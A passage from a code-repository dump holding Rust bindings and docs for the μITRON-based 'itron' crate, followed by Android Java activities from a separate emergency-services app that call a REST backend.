..self.raw
},
..self
}
}
}
impl Builder<()> {
/// Create a dataqueue using the specified parameters.
#[allow(unused_mut)]
pub fn finish(mut self) -> Result<Dataqueue, Error<BuildError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
if self.capacity_overflow {
// Safety: `E_NOMEM` is handled by `BuildError`
// (Warning: This is not true for `cfg(feature = "none")`.)
return Err(Error::new_unchecked(ErrorCode::new_unchecked(abi::E_NOMEM)));
}
let id = Error::err_if_negative(abi::acre_dtq(&self.raw))?;
// Safety: We own the dataqueue we create
Ok(Dataqueue::from_raw_nonnull(abi::NonNullID::new_unchecked(
id,
)))
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// An owned dataqueue.
///
/// [Deletes] the dataqueue automatically when dropped. The destructor will
/// panic if the deletion fails.
///
/// [Deletes]: DataqueueRef::delete
#[derive(PartialEq, Eq)]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub struct Dataqueue(DataqueueRef<'static>);
impl fmt::Debug for Dataqueue {
#[inline]
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
self.0.fmt(f)
}
}
impl Drop for Dataqueue {
#[inline]
fn drop(&mut self) {
unsafe { self.0.delete().unwrap() };
}
}
impl Dataqueue {
/// Construct a `Dataqueue` from a raw object ID.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
Self(unsafe { DataqueueRef::from_raw_nonnull(id) })
}
/// Consume and "leak" `self`, returning a reference `DataqueueRef<'a>`.
#[inline]
pub const fn leak<'a>(self) -> DataqueueRef<'a> {
let out = self.0;
core::mem::forget(self);
out
}
/// Get the raw object ID.
#[inline]
pub const fn as_raw(&self) -> abi::ID {
self.0.as_raw()
}
/// Get the raw object ID as [` abi::NonNullID`].
#[inline]
pub const fn as_raw_nonnull(&self) -> abi::NonNullID {
self.0.as_raw_nonnull()
}
/// Borrow `Dataqueue` as [`DataqueueRef`].
///
/// Use this to perform operations on dataqueues because most of the
/// methods are implemented on `DataqueueRef` but not `Dataqueue`.
#[inline]
pub const fn as_ref(&self) -> DataqueueRef<'_> {
self.0
}
}
}
<file_sep>/src/abi/types.rs
//! Provides basic data type definitions and constants.
//!
//! Types that can be unambiguously mapped to Rust types, such as `int32_t`
//! but not `int_t`, should not have type aliases to minimize the maintenance
//! efforts.
/// 自然なサイズの符号付き整数
pub type int_t = i32;
/// 自然なサイズの符号無し整数
pub type uint_t = u32;
pub type bool_t = int_t;
/// Represents a truthy value.
pub const TRUE: bool_t = 1;
/// Represents a falsy value.
pub const FALSE: bool_t = 0;
/// 機能コード
pub type FN = int_t;
/// エラーコード
pub type ER = int_t;
// Non-zero version of [`ER`]
pub type NonZeroER = core::num::NonZeroI32;
/// オブジェクトのID番号
pub type ID = int_t;
/// Non-null version of [`ID`]
pub type NonNullID = core::num::NonZeroI32;
/// オブジェクトの属性
pub type ATR = uint_t;
/// オブジェクトの状態
pub type STAT = uint_t;
/// サービスコールの動作モード
pub type MODE = uint_t;
/// 優先度
pub type PRI = int_t;
/// タイムアウト指定
pub type TMO = u32;
/// 拡張情報
pub type EXINF = core::mem::MaybeUninit<isize>;
/// 相対時間
pub type RELTIM = u32;
// Assuming `defined(UINT64_MAX)`
/// システム時刻
pub type SYSTIM = u64;
// Assuming `USE_64BIT_HRTCNT`
/// 高分解能タイマのカウント値
pub type HRTCNT = u64;
#[cfg(all(feature = "asp3", feature = "ovrhdr"))]
/// プロセッサ時間[NGKI0573]
pub type PRCTIM = u32;
/// プログラムの起動番地
pub type FP = unsafe fn();
/// エラーコードまたは真偽値
pub type ER_BOOL = int_t;
/// エラーコードまたはID番号
pub type ER_ID = int_t;
/// エラーコードまたは符号無し整数
pub type ER_UINT = int_t;
/// 管理領域を確保するためのデータ型
pub type MB_T = usize;
/// アクセス許可パターン
pub type ACPTN = u32;
/// アクセス許可ベクタ
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct acvct {
/// 通常操作1のアクセス許可パターン
pub acptn1: ACPTN,
/// 通常操作2のアクセス許可パターン
pub acptn2: ACPTN,
/// 管理操作のアクセス許可パターン
pub acptn3: ACPTN,
/// 参照操作のアクセス許可パターン
pub acptn4: ACPTN,
}
/// イベントフラグのビットパターン
pub type FLGPTN = uint_t;
/// 割込み番号
pub type INTNO = uint_t;
/// 割込みハンドラ番号
pub type INHNO = uint_t;
/// CPU例外ハンドラ番号
pub type EXCNO = uint_t;
/// 固定長メモリプール領域を確保するための型
pub type MPF_T = isize;
/*
* オブジェクト属性
*/
/// オブジェクト属性を指定しない
pub const TA_NULL: ATR = 0;
/*
* タイムアウト指定
*/
/// ポーリング
pub const TMO_POL: TMO = 0;
/// 永久待ち
pub const TMO_FEVR: TMO = TMO::MAX;
/// ノンブロッキング
pub const TMO_NBLK: TMO = TMO::MAX - 1;
/// 相対時間(RELTIM)に指定できる最大値[NGKI0551]
///
/// 66分40秒まで指定可
pub const TMAX_RELTIM: TMO = 4_000_000_000;
/*
* アクセス許可パターン
*/
/// カーネルドメインだけにアクセスを許可
pub const TACP_KERNEL: ACPTN = 0;
/// すべてのドメインからアクセスを許可
pub const TACP_SHARED: ACPTN = !0;
<file_sep>/src/abi/task.rs
use super::{bool_t, uint_t, ATR, ER, ER_ID, ER_UINT, EXINF, ID, PRI, RELTIM, STAT, TMO};
/*
* 処理単位の型定義
*/
pub type TASK = Option<unsafe extern "C" fn(EXINF)>;
/*
* オブジェクト属性の定義
*/
/// タスクを起動された状態で生成
pub const TA_ACT: ATR = 0x01;
/// 起動要求をキューイングしない
pub const TA_NOACTQUE: ATR = 0x02;
#[cfg(all(feature = "asp3", feature = "rstr_task"))]
/// 制約タスク
pub const TA_RSTR: ATR = 0x04;
/*
* オブジェクトの状態の定義
*/
/// 実行状態
pub const TTS_RUN: STAT = 0x01;
/// 実行可能状態
pub const TTS_RDY: STAT = 0x02;
/// 待ち状態
pub const TTS_WAI: STAT = 0x04;
/// 強制待ち状態
pub const TTS_SUS: STAT = 0x08;
/// 二重待ち状態
pub const TTS_WAS: STAT = 0x0c;
/// 休止状態
pub const TTS_DMT: STAT = 0x10;
/// 起床待ち
pub const TTW_SLP: STAT = 0x0001;
/// 時間経過待ち
pub const TTW_DLY: STAT = 0x0002;
/// セマフォの資源獲得待ち
pub const TTW_SEM: STAT = 0x0004;
/// イベントフラグ待ち
pub const TTW_FLG: STAT = 0x0008;
/// データキューへの送信待ち
pub const TTW_SDTQ: STAT = 0x0010;
/// データキューからの受信待ち
pub const TTW_RDTQ: STAT = 0x0020;
/// 優先度データキューへの送信待ち
pub const TTW_SPDQ: STAT = 0x0100;
/// 優先度データキューからの受信待ち
pub const TTW_RPDQ: STAT = 0x0200;
#[cfg(any(
all(feature = "asp3", feature = "messagebuf"),
all(feature = "solid_asp3", feature = "messagebuf")
))]
/// メッセージバッファへの送信待ち
pub const TTW_SMBF: STAT = 0x0400;
#[cfg(any(
all(feature = "asp3", feature = "messagebuf"),
all(feature = "solid_asp3", feature = "messagebuf")
))]
/// メッセージバッファからの受信待ち
pub const TTW_RMBF: STAT = 0x0800;
/// ミューテックスのロック待ち状態
pub const TTW_MTX: STAT = 0x0080;
/// 固定長メモリブロックの獲得待ち
pub const TTW_MPF: STAT = 0x2000;
/*
* その他の定数の定義
*/
/// 自タスク指定
pub const TSK_SELF: ID = 0;
/// 該当するタスクがない
pub const TSK_NONE: ID = 0;
/// 自タスクのベース優先度
pub const TPRI_SELF: PRI = 0;
/// タスクの起動時優先度
pub const TPRI_INI: PRI = 0;
/// TOPPERS/ASP3 dynamic creation extension `T_CTSK`
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy)]
#[repr(C)]
pub struct T_CTSK {
/// タスク属性
pub tskatr: ATR,
/// タスクの拡張情報
pub exinf: EXINF,
/// タスクのメインルーチンの先頭番地
pub task: TASK,
/// タスクの起動時優先度
pub itskpri: PRI,
/// タスクのスタック領域のサイズ
pub stksz: usize,
/// タスクのスタック領域の先頭番地
pub stk: *mut u8,
}
/// SOLID/FMP3 extension
#[cfg(all(feature = "solid_fmp3", feature = "dcre"))]
#[derive(Debug, Clone, Copy)]
#[repr(C)]
pub struct T_CTSK {
/// タスク属性
pub tskatr: ATR,
/// タスクの拡張情報
pub exinf: EXINF,
/// タスクのメインルーチンの先頭番地
pub task: TASK,
/// タスクの起動時優先度
pub itskpri: PRI,
/// タスクのスタック領域のサイズ
pub stksz: usize,
/// タスクのスタック領域の先頭番地
pub stk: *mut u8,
/// タスクの初期割付けプロセッサ
pub iprcid: ID,
/// タスクの割付け可能プロセッサ
pub affinity: uint_t,
}
/// TOPPERS/ASP3 `T_RTSK`
#[cfg(any(feature = "asp3", feature = "solid_asp3"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RTSK {
/// タスク状態
pub tskstat: STAT,
/// タスクの現在優先度
pub tskpri: PRI,
/// タスクのベース優先度
pub tskbpri: PRI,
/// 待ち要因
pub tskwait: STAT,
/// 待ち対象のオブジェクトのID
pub wobjid: ID,
/// タイムアウトするまでの時間
pub lefttmo: TMO,
/// 起動要求キューイング数
pub actcnt: uint_t,
/// 起床要求キューイング数
pub wupcnt: uint_t,
/// タスク終了要求状態
pub raster: bool_t,
/// タスク終了禁止状態
pub dister: bool_t,
}
/// TOPPERS/FMP3 `T_RTSK`
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RTSK {
/// タスク状態
pub tskstat: STAT,
/// タスクの現在優先度
pub tskpri: PRI,
/// タスクのベース優先度
pub tskbpri: PRI,
/// 待ち要因
pub tskwait: STAT,
/// 待ち対象のオブジェクトのID
pub wobjid: ID,
/// タイムアウトするまでの時間
pub lefttmo: TMO,
/// 起動要求キューイング数
pub actcnt: uint_t,
/// 起床要求キューイング数
pub wupcnt: uint_t,
/// タスク終了要求状態
pub raster: bool_t,
/// タスク終了禁止状態
pub dister: bool_t,
/// 割付けプロセッサのID
pub prcid: ID,
/// 次の起動時の割付けプロセッサのID
pub actprc: ID,
}
/// タスク管理機能
#[cfg(any(
feature = "asp3",
feature = "fmp3",
feature = "solid_asp3",
feature = "solid_fmp3"
))]
extern "C" {
pub fn act_tsk(tskid: ID) -> ER;
pub fn can_act(tskid: ID) -> ER_UINT;
pub fn get_tst(tskid: ID, p_tskstat: *mut STAT) -> ER;
pub fn chg_pri(tskid: ID, tskpri: PRI) -> ER;
pub fn get_pri(tskid: ID, p_tskpri: *mut PRI) -> ER;
pub fn get_inf(p_exinf: *mut isize) -> ER;
pub fn ref_tsk(tskid: ID, pk_rtsk: *mut T_RTSK) -> ER;
}
/// タスク管理機能
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
extern "C" {
pub fn mact_tsk(tskid: ID, prcid: ID) -> ER;
pub fn mig_tsk(tskid: ID, prcid: ID) -> ER;
}
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
extern "C" {
pub fn acre_tsk(pk_ctsk: *const T_CTSK) -> ER_ID;
pub fn del_tsk(tskid: ID) -> ER;
}
#[cfg(any(
all(feature = "asp3", feature = "subprio"),
feature = "fmp3",
feature = "solid_fmp3"
))]
extern "C" {
pub fn chg_spr(tskid: ID, subpri: uint_t) -> ER;
}
/// タスク付属同期機能
#[cfg(any(
feature = "asp3",
feature = "fmp3",
feature = "solid_asp3",
feature = "solid_fmp3"
))]
extern "C" {
pub fn slp_tsk() -> ER;
pub fn tslp_tsk(tmout: TMO) -> ER;
pub fn wup_tsk(tskid: ID) -> ER;
pub fn can_wup(tskid: ID) -> ER_UINT;
pub fn rel_wai(tskid: ID) -> ER;
pub fn sus_tsk(tskid: ID) -> ER;
pub fn rsm_tsk(tskid: ID) -> ER;
pub fn dly_tsk(dlytim: RELTIM) -> ER;
}
/// タスク終了機能
#[cfg(any(
feature = "asp3",
feature = "fmp3",
feature = "solid_asp3",
feature = "solid_fmp3"
))]
extern "C" {
pub fn ext_tsk() -> ER;
pub fn ras_ter(tskid: ID) -> ER;
pub fn dis_ter() -> ER;
pub fn ena_ter() -> ER;
pub fn sns_ter() -> bool_t;
pub fn ter_tsk(tskid: ID) -> ER;
}
/// 自タスクの終了&削除
#[cfg(any(
all(feature = "solid_asp3", feature = "exd_tsk"),
all(feature = "solid_fmp3", feature = "exd_tsk")
))]
extern "C" {
pub fn exd_tsk() -> ER;
}
<file_sep>/README.md
# `itron`
<a href="https://docs.rs/itron/"><img src="https://docs.rs/itron/badge.svg" alt="docs.rs"></a> <a href="https://solid-rs.github.io/itron-rs/doc/itron_asp3/index.html" label="Per-kernel documentation"><img src="https://solid-rs.github.io/itron-rs/doc/badge.svg"></a> <a href="https://crates.io/crates/itron"><img src="https://img.shields.io/crates/v/itron"></a> <img src="https://img.shields.io/badge/license-0BSD-blue">
A [Rust] interface to interact with operating systems based on [μITRON] or its derivative.
[Rust]: https://www.rust-lang.org/
[μITRON]: http://ertl.jp/ITRON/SPEC/mitron4-e.html
This is not an officially supported project.
## Examples
`Cargo.toml`:
```toml
[dependencies]
itron = { version = "0.1.0", features = ["asp3", "dcre"] }
```
Using the low-level binding:
```rust
use core::{mem, ptr};
use itron::abi::{acre_tsk, TA_ACT, T_CTSK, EXINF, ID};
fn create_task(param: isize) -> ID {
extern "C" fn task_body(exinf: EXINF) {
let _param = unsafe { exinf.assume_init() };
}
let er = unsafe {
acre_tsk(&T_CTSK {
tskatr: TA_ACT,
exinf: mem::MaybeUninit::new(param),
task: Some(task_body),
itskpri: 4,
stksz: 2048,
stk: ptr::null_mut(),
})
};
assert!(er >= 0, "could not create a task (error {})", er);
er
}
```
Using the safe, high-level binding (experimental, requires `unstable` feature):
```rust
use itron::task;
fn create_task(param: isize) -> task::Task {
let task_body = move || {
let _param = param;
};
let new_task = task::Task::build()
.start(create_task)
.stack_size(2048)
.initial_priority(4)
.finish()
.expect("could not create a task");
new_task.as_ref().activate().unwrap();
new_task
}
```
<file_sep>/CHANGELOG.md
All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](http://keepachangelog.com/en/1.0.0/)
and this project adheres to [Semantic Versioning](http://semver.org/spec/v2.0.0.html).
## [Unreleased]
- **Changed:** `itron::task::Task::{set_priority → set_base_priority}`
## [0.1.9] - 2021-11-19
- Documentation update
## [0.1.8] - 2021-10-01
- **Fixed:** `itron::abi::exd_tsk` shouldn't be exposed unless `cfg(feature = "exd_tsk")`
- **Fixed:** Require `Send`-ness for the `impl IntoClosure` passed to `task::Builder::start`
## [0.1.7] - 2021-07-01
- **Fixed:** The macros in `itron::macros::match_kernel` did not match anything
## [0.1.6] - 2021-07-01
- **Added:** `itron::macros::{match_kernel, tt_is_kernel}` now support OR patterns
- **Fixed:** The macros in `itron::macros::*` now locate `tt_call` correctly
## [0.1.5] - 2021-07-01
- **Added:** `itron::processor::Processor` now implements `TryFrom<usize>`
- **Added:** `itron::macros`
- **Added:** `itron::{dataqueue, messagebuffer}::Info::is_empty`
## [0.1.4] - 2021-06-30
- **Changed:** `itron::task::Builder::{stack → stack_size}`
- **Changed:** `itron::{processor, task::{Task::activate_on, Builder::initial_processor}}`, etc. are now exposed on uniprocessor kernels
- **Added:** `itron::abi::{acre_cyc, acre_alm, acre_isr}`
- **Added:** `itron::abi::acre_mpf` when `cfg(all(feature = "solid_asp3", feature = "dcre"))`
- **Added:** `itron::abi::exd_tsk`
- **Added:** `itron::task::Builder::finish_and_activate`
- **Added:** `itron::task::TaskRef::migrate`
- **Added:** `itron::memorypool::MemoryPool[Ref]`
- **Added:** `itron::messagebuffer::MessageBuffer[Ref]`
## [0.1.3] - 2021-06-23
- **Added:** `itron::abi::E_OK`
- **Added:** `itron::dataqueue::Dataqueue[Ref]`
- **Changed:** `itron::processor::current` now returns `Result<Processor, _>` instead of `Result<Option<abi::NonNullID>, _>`.
## [0.1.2] - 2021-06-21
- **Added:** `itron::{mutex::TryLockError, semaphore::PollError}::Timeout`
## [0.1.1] - 2021-06-21
- **Added:** `itron::abi::{TA_TPRI, TA_WMUL, TA_CLR, TA_RTSK, TA_CEILING, TWF_*, TTW_*}`
- **Added:** `itron::semaphore::Semaphore[Ref]`
- **Added:** `itron::mutex::Mutex[Ref]`
- **Added:** `itron::processor`
- **Added:** `itron::abi::{*_mbf}` (message buffers) and Cargo feature `messagebuf`
- **Added:** `itron::abi::{*_ovr}` (overrun handlers) and Cargo feature `ovrhdr`
- **Added:** `itron::abi::chg_spr` (change task subpriority) and Cargo feature `subprio`
- **Added:** `itron::abi::TA_INHERIT` (priority inheritance mutexes) and Cargo feature `pi_mutex`
- **Added:** Cargo features `fmp3`, `solid_asp3`, and `solid_fmp3`
## 0.1.0 - 2021-06-15
- Initial release.
[Unreleased]: https://github.com/solid-rs/itron-rs/compare/0.1.9...main
[0.1.9]: https://github.com/solid-rs/itron-rs/compare/0.1.8...0.1.9
[0.1.8]: https://github.com/solid-rs/itron-rs/compare/0.1.7...0.1.8
[0.1.7]: https://github.com/solid-rs/itron-rs/compare/0.1.6...0.1.7
[0.1.6]: https://github.com/solid-rs/itron-rs/compare/0.1.5...0.1.6
[0.1.5]: https://github.com/solid-rs/itron-rs/compare/0.1.4...0.1.5
[0.1.4]: https://github.com/solid-rs/itron-rs/compare/0.1.3...0.1.4
[0.1.3]: https://github.com/solid-rs/itron-rs/compare/0.1.2...0.1.3
[0.1.2]: https://github.com/solid-rs/itron-rs/compare/0.1.1...0.1.2
[0.1.1]: https://github.com/solid-rs/itron-rs/compare/0.1.0...0.1.1
<file_sep>/src/abi/mempool.rs
use super::{uint_t, ATR, ER, ER_ID, ID, MPF_T, TMO};
#[cfg(any(
feature = "asp3",
feature = "fmp3",
feature = "solid_asp3",
feature = "solid_fmp3"
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RMPF {
/// 固定長メモリプールの待ち行列の先頭のタスクのID番号
pub wtskid: ID,
/// 固定長メモリプール領域の空きメモリ領域に割り付けることができる固定長メモリブロックの数
pub fblkcnt: uint_t,
}
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_CMPF {
/// 固定長メモリプール属性
pub mpfatr: ATR,
/// 獲得できる固定長メモリブロックの数
pub blkcnt: uint_t,
/// 固定長メモリブロックのサイズ
pub blksz: uint_t,
/// 固定長メモリプール領域の先頭番地
pub mpf: *mut MPF_T,
/// 固定長メモリプール管理領域の先頭番地
pub mpfmb: *mut u8,
}
/// メモリプール管理機能
#[cfg(any(
feature = "asp3",
feature = "fmp3",
feature = "solid_asp3",
feature = "solid_fmp3"
))]
extern "C" {
pub fn get_mpf(mpfid: ID, p_blk: *mut *mut u8) -> ER;
pub fn pget_mpf(mpfid: ID, p_blk: *mut *mut u8) -> ER;
pub fn tget_mpf(mpfid: ID, p_blk: *mut *mut u8, tmout: TMO) -> ER;
pub fn rel_mpf(mpfid: ID, blk: *mut u8) -> ER;
pub fn ini_mpf(mpfid: ID) -> ER;
pub fn ref_mpf(mpfid: ID, pk_rmpf: *mut T_RMPF) -> ER;
}
/// メモリプール管理機能
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
extern "C" {
pub fn acre_mpf(pk_cmpf: *const T_CMPF) -> ER_ID;
pub fn del_mpf(mpfid: ID) -> ER;
}
<file_sep>/src/kernel.rs
//! Miscellaneous functions that are not associated to specific kernel objects.
#[cfg(any())]
use crate::error::Kind;
use crate::{
abi,
error::{Error, ErrorCode, ErrorKind},
};
define_error_kind! {
/// Error type for [`exit`].
pub enum ExitError {
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for ExitError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// `E_SYS` is a critical error, so it's excluded from here
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
// TODO: rot_rdq
// TODO: mrot_rdq
// TODO: get_lod
// TODO: mget_lod
// TODO: get_nth
// TODO: mget_nth
// TODO: loc_cpu
// TODO: unl_cpu
// TODO: dis_dsp
// TODO: ena_dsp
/// `sns_ctx`: Get a flag indicating whether the current thread is in a task
/// context.
#[inline]
#[doc(alias = "sns_ctx")]
pub fn is_task_context() -> bool {
match () {
#[cfg(not(feature = "none"))]
() => (unsafe { abi::sns_ctx() } == 0),
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `sns_loc`: Get a flag indicating whether the CPU lock state is active.
#[inline]
#[doc(alias = "sns_loc")]
pub fn is_cpu_lock_active() -> bool {
match () {
#[cfg(not(feature = "none"))]
() => (unsafe { abi::sns_loc() } != 0),
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `sns_dsp`: Get a flag indicating whether dispatching is disabled.
#[inline]
#[doc(alias = "sns_dsp")]
pub fn is_dispatching_disabled() -> bool {
match () {
#[cfg(not(feature = "none"))]
() => (unsafe { abi::sns_dsp() } != 0),
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `sns_dpn`: Get a flag indicating whether the dispatch pending state is
/// active.
#[inline]
#[doc(alias = "sns_dpn")]
pub fn is_dispatch_pending_active() -> bool {
match () {
#[cfg(not(feature = "none"))]
() => (unsafe { abi::sns_dpn() } != 0),
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `sns_ker`: Get a flag indicating whether the kernel is in an operational
/// state.
///
/// If this function returns `false`, all kernel API functions except for
/// `sns_ker` are unsafe to call.
#[inline]
#[doc(alias = "sns_ker")]
pub fn is_operational() -> bool {
match () {
#[cfg(not(feature = "none"))]
() => (unsafe { abi::sns_ker() } == 0),
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ext_ker`: Terminate the kernel.
///
/// This function will not return if it succeeds.
#[inline]
#[doc(alias = "ext_ker")]
pub fn exit() -> Error<ExitError> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe { Error::new_unchecked(ErrorCode::new_unchecked(abi::ext_ker())) },
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
| e57b655a7de61eac9ae23bfd001f128156ae2298 | [
"TOML",
"Rust",
"Markdown"
] | 35 | Rust | kawadakk/itron-rs | 5167f5ef0cf1624ce52299f27bbed2654fd1c90f | 7f7b525164e2c2927ab8e8743a40b9f9f47e614d |
refs/heads/master | <file_sep>require 'pry'
def alphabetize(arr)
esperanto_alphabet = "abcĉdefgĝhĥijĵklmnoprsŝtuŭvz".chars
arr.sort_by do |phrase|
phrase.chars.map { |c| esperanto_alphabet.index(c) }
end
end
| 1bae1f1245a70f72f5d2fbfbee3688d9040859e8 | [
"Ruby"
] | 1 | Ruby | wesleyfriedman/alphabetize-in-esperanto-web-0916 | c777fb666bb32e0dcfbc430087ffda628270e06b | 49ad66c5a79f638bc8c302d79fbb5f5eaba9ed49 |
refs/heads/master | <file_sep>package com.example.emergencyservices;
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.content.SharedPreferences;
import android.os.AsyncTask;
import android.os.Bundle;
import android.util.Log;
import android.view.View;
import android.widget.Button;
import android.widget.TextView;
import android.widget.Toast;
import org.json.JSONObject;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
public class Request_userDetailsActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_request_user_details);
int request_user_id = getIntent().getIntExtra("Request_userid",-1);
String request_address = getIntent().getStringExtra("Request_address");
final int request_id = getIntent().getIntExtra("Request_id",-1);
GetRequestsDetails(request_address,request_user_id);
Button accept = (Button)findViewById(R.id.save_id);
SharedPreferences sp;
sp = getSharedPreferences("login",MODE_PRIVATE);
final String serviceprovider_name = sp.getString("UserName_service",null);
accept.setOnClickListener(new View.OnClickListener() {
public void onClick(View v) {
AcceptRequest(request_id,serviceprovider_name);
}
});
}
public AcceptRequestConnect ac;
public void AcceptRequest(int request_id,String serviceprovider_name){
ac = new AcceptRequestConnect(request_id,serviceprovider_name);
ac.execute();
}
public class AcceptRequestConnect extends AsyncTask<String,String,String>{
int req_id_local;
String ser_name_local;
AcceptRequestConnect(int req_id,String name){
req_id_local=req_id;
ser_name_local=name;
}
@Override
protected String doInBackground(String... params){
try{
String ip = "172.16.101.50";
// jsonObject = new JSONObject();
String serverURL="http://"+ip+":8080/EmergencyServicesBackend/webapi/resource/accept_request/"+req_id_local+"/"+ser_name_local;
URL url = new URL(serverURL);
HttpURLConnection connection = (HttpURLConnection)url.openConnection();
connection.setRequestMethod("PUT");
connection.setRequestProperty("Content-Type", "text/plain; charset=UTF-8");
InputStream is = connection.getInputStream();
BufferedReader r = new BufferedReader(new InputStreamReader(is));
StringBuilder total = new StringBuilder();
String line;
while ((line = r.readLine()) != null)
{
total.append(line);
}
is.close();
line = total.toString();
line = line.trim();
return line;
}
catch(MalformedURLException e){
e.printStackTrace();
}
catch (IOException e){
e.printStackTrace();
}
catch (Exception e){
e.printStackTrace();
}
return null;
}
@Override
protected void onPostExecute(String s) {
if(s==null){
Log.d("Request_detailsActivity", "Some error has occurred at Server or connection error");
}
else if(s.equals("invalid") || s.equals("req_id is becoming -1")){
Log.e("Request_detailsActivity","Request cancelled");
Toast.makeText(Request_userDetailsActivity.this,"Request cancelled",Toast.LENGTH_LONG).show();
}
else if(s.equals("SQL Exception")){
Log.e("Request_detailsActivity", "Some error has occurred at Server");
Toast.makeText(Request_userDetailsActivity.this,"Some error has occurred at Server",Toast.LENGTH_LONG).show();
}
else if(s.equals("valid")){
Intent i = new Intent(Request_userDetailsActivity.this,Main_seviceproviderActivity.class);
startActivity(i);
Log.d("Request_detailsActivity", "Request Succesful");
}
else{
Log.e("Request_detailsActivity", "Data from Server: " + s);
Toast.makeText(Request_userDetailsActivity.this,"Can't accept request",Toast.LENGTH_LONG).show();
}
}
@Override
protected void onCancelled() {
ac = null;
}
}
public GetRequestsDetailsConnect gc;
public void GetRequestsDetails(String address,int uid){
gc = new GetRequestsDetailsConnect(address,uid);
gc.execute();
}
public class GetRequestsDetailsConnect extends AsyncTask<String,String,String> {
String address,name_local,phno_local;
int user_id;
GetRequestsDetailsConnect(String a,int uid){
address=a;
user_id=uid;
}
@Override
protected String doInBackground(String... params){
try{
String ip = "172.16.101.50";
// jsonObject = new JSONObject();
String serverURL="http://"+ip+":8080/EmergencyServicesBackend/webapi/resource/get_clientdetails/"+user_id;
URL url = new URL(serverURL);
HttpURLConnection connection = (HttpURLConnection)url.openConnection();
connection.setRequestMethod("GET");
connection.setRequestProperty("Content-Type", "text/plain; charset=UTF-8");
InputStream is = connection.getInputStream();
BufferedReader r = new BufferedReader(new InputStreamReader(is));
StringBuilder total = new StringBuilder();
String line;
while ((line = r.readLine()) != null)
{
total.append(line);
}
is.close();
line = total.toString();
line = line.trim();
System.out.println("line = "+line);
JSONObject jsonObj = new JSONObject(line);
name_local = jsonObj.getString("name");
phno_local = jsonObj.getString("phno");
return line;
}
catch(MalformedURLException e){
e.printStackTrace();
}
catch (IOException e){
e.printStackTrace();
}
catch (Exception e){
e.printStackTrace();
}
return null;
}
@Override
protected void onPostExecute(String s) {
if(s==null){
Log.d("Request_detailsActivity", "Some error has occurred at Server or connection error");
}
else if(s.equals("invalid") || s.equals("user_id is becoming -1")){
Log.e("Request_detailsActivity", "Request cancelled");
Toast.makeText(Request_userDetailsActivity.this,"Request cancelled",Toast.LENGTH_LONG).show();
}
else if(s.equals("Exception")){
Log.e("Request_detailsActivity", "Some error has occurred at Server");
Toast.makeText(Request_userDetailsActivity.this,"Some error has occurred at Server",Toast.LENGTH_LONG).show();
}
else
{
TextView nameText = (TextView) findViewById(R.id.name_serviceprovider_id);
nameText.append(" "+name_local);
TextView addressText = (TextView) findViewById(R.id.address_id);
addressText.append(address);
TextView phnoText = (TextView) findViewById(R.id.phno_serviceprovider_id);
phnoText.append(" "+phno_local);
Log.d("Request_detailsActivity", "Request Succesful");
}
}
@Override
protected void onCancelled() {
gc = null;
}
}
}
<file_sep>package com.example.emergencyservices;
import androidx.appcompat.app.AppCompatActivity;
import java.sql.Connection;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;
import android.os.StrictMode;
import android.annotation.SuppressLint;
import android.os.AsyncTask;
import android.os.Bundle;
import android.view.View;
import android.widget.AdapterView;
import android.widget.ArrayAdapter;
import android.widget.Button;
import android.widget.EditText;
import android.widget.ProgressBar;
import android.widget.Spinner;
import android.widget.Toast;
import android.widget.AdapterView.OnItemSelectedListener;
import android.content.Intent;
import android.util.Log;
import java.sql.DriverManager;
public class SignupActivity_JDBC extends AppCompatActivity implements OnItemSelectedListener{
EditText name,phno,password;
Spinner bloodgrp;
ProgressBar pb;
Button signup_button,go_login;
Connection conn;
String un,pass,db,ip;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_signup);
name = (EditText)findViewById(R.id.signup_name_id);
phno = (EditText)findViewById(R.id.signup_phno_id);
password = (EditText)findViewById(R.id.signup_pass_id);
